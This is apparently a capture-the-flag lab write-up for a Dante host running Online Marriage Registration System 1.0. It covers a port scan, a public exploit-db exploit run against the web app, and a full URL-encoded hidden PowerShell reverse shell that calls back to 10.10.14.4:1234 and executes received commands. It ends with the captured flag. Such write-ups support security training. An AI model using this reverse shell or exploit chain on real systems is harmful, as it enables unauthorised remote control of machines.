Enumeration

Rustscan

rustscan -a 172.16.1.102 --ulimit 5000 -- -Pn -sV --script \"'vuln'\"

Open 172.16.1.102:80
Open 172.16.1.102:135
Open 172.16.1.102:139
Open 172.16.1.102:445
Open 172.16.1.102:443
Open 172.16.1.102:3306
Open 172.16.1.102:3389
Open 172.16.1.102:5985
Open 172.16.1.102:33060
Open 172.16.1.102:49665
Open 172.16.1.102:49668
Open 172.16.1.102:49664
Open 172.16.1.102:49666
Open 172.16.1.102:49667
Open 172.16.1.102:62828

Port 80

Online Marriage registrarion system 1.0

Searching google if there is any exploits available for it. https://www.exploit-db.com/exploits/49557

python3 script.py -u http://172.16.1.102:80/ -c 'whoami'

 
powershell%20-nop%20-W%20hidden%20-noni%20-ep%20bypass%20-c%20%22%24TCPClient%20%3D%20New-Object%20Net.Sockets.TCPClient%28%2710.10.14.4%27%2C%201234%29%3B%24NetworkStream%20%3D%20%24TCPClient.GetStream%28%29%3B%24StreamWriter%20%3D%20New-Object%20IO.StreamWriter%28%24NetworkStream%29%3Bfunction%20WriteToStream%20%28%24String%29%20%7B%5Bbyte%5B%5D%5D%24script%3ABuffer%20%3D%200..%24TCPClient.ReceiveBufferSize%20%7C%20%25%20%7B0%7D%3B%24StreamWriter.Write%28%24String%20%2B%20%27SHELL%3E%20%27%29%3B%24StreamWriter.Flush%28%29%7DWriteToStream%20%27%27%3Bwhile%28%28%24BytesRead%20%3D%20%24NetworkStream.Read%28%24Buffer%2C%200%2C%20%24Buffer.Length%29%29%20-gt%200%29%20%7B%24Command%20%3D%20%28%5Btext.encoding%5D%3A%3AUTF8%29.GetString%28%24Buffer%2C%200%2C%20%24BytesRead%20-%201%29%3B%24Output%20%3D%20try%20%7BInvoke-Expression%20%24Command%202%3E%261%20%7C%20Out-String%7D%20catch%20%7B%24_%20%7C%20Out-String%7DWriteToStream%20%28%24Output%29%7D%24StreamWriter.Close%28%29%22

Getting flag

Location: Directory: C:\Users\blake\Desktop DANTE{U_M4y_Kiss_Th3_Br1d3}

Malleum Knowledge Base

Explorer

Enumeration

Rustscan

Port 80

Getting flag

Graph View

Table of Contents